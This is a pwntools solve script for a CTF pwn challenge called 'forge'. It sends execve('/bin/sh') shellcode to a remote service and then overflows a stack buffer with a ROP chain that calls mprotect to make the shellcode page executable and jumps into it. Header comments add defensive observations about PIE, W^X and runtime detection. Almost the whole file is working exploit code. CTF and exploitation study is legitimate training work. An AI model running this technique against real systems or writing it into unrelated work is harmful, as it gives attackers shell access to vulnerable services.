# CTF solve script (m0leCon "forge" challenge, pwntools).
#
# What the script does, as far as the code below shows: it sends a
# shellcode blob to the service, then sends an oversized "Input" that
# overwrites the saved return address with a ROP chain.  The chain calls
# mprotect() through the binary's PLT to mark the page holding the
# received shellcode RWX and then returns into that shellcode.
#
# Reviewer notes (defensive reading):
#   * Every gadget and the shellcode buffer sit at fixed 0x40xxxx
#     addresses, i.e. the target binary appears to be non-PIE; building
#     with PIE would invalidate the hard-coded addresses.
#   * The chain only works because mprotect is importable via the PLT and
#     the process may flip a writable page to executable.  A W^X policy
#     (e.g. seccomp denying mprotect with PROT_EXEC) or simply not
#     linking mprotect removes this primitive.
#   * mprotect(PROT_READ|PROT_WRITE|PROT_EXEC) on a data page is a
#     classic runtime-detection signal for this technique.
from pwn import *

# Set the pwntools context (arch, bits, endianness) from the target ELF.
context.binary = elf = ELF("./forge", checksec=False)

# Local debugging alternative is kept commented out; live target is remote.
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13574)

# Bytes of padding before the saved return address on the stack
# (offset inferred by the author; not derivable from this file alone).
OFF_INPUT = 64

# ROP gadgets (hard-coded addresses in the non-PIE binary).
ret = 0x000000000040101A  # plain `ret`; likely used for 16-byte stack alignment
pop_rdi = 0x00000000004011FB  # arg 1 -> rdi
pop_rsi = 0x0000000000401204  # arg 2 -> rsi
pop_rdx = 0x000000000040120D  # arg 3 -> rdx

# Address where the service stores the received shellcode (presumably a
# .bss buffer, judging by the 0x404xxx range — TODO confirm against the binary).
shellcode_addr = 0x0000000000404080

# mprotect() is called via its PLT stub, so no libc leak is needed.
MPROTECT_PLT = elf.plt["mprotect"]
# PROT_READ | PROT_WRITE | PROT_EXEC
PROT = 0x7

print(p.recvuntil(b"[forge] Send shellcode:\n"))

# Stage 1: the payload that will later be executed — a pwntools
# execve("/bin/sh") stub assembled for the context's architecture.
shellcode = flat(asm(shellcraft.sh()))
SHELLCODE_SIZE = 200  # NOTE: declared but not used below
p.send(shellcode)
# p.send(b"A")
# p.send(b"\n")

print(p.recvuntil(b"[forge] Input:\n"))

# Stage 2: ROP chain.  flat() concatenates the pieces; the bare int 4096
# is packed by flat() according to context.bits, so it ends up as a
# word just like the explicit p64() values around it.
payload = flat(
    b"A" * OFF_INPUT,
    p64(ret),
    p64(pop_rdi),
    p64(shellcode_addr & 0xFFFFF000),  # Must be page aligned (assumes 4 KiB pages)
    p64(pop_rsi),
    4096,  # mprotect length: one page
    p64(pop_rdx),
    p64(PROT),
    # p64(ret),
    p64(MPROTECT_PLT),  # mprotect(page, 4096, RWX)
    p64(shellcode_addr),  # "return" into the now-executable shellcode
)
p.send(payload)
# p.send(b"\n")

# Hand the connection to the user once the shell is expected to be up.
p.interactive()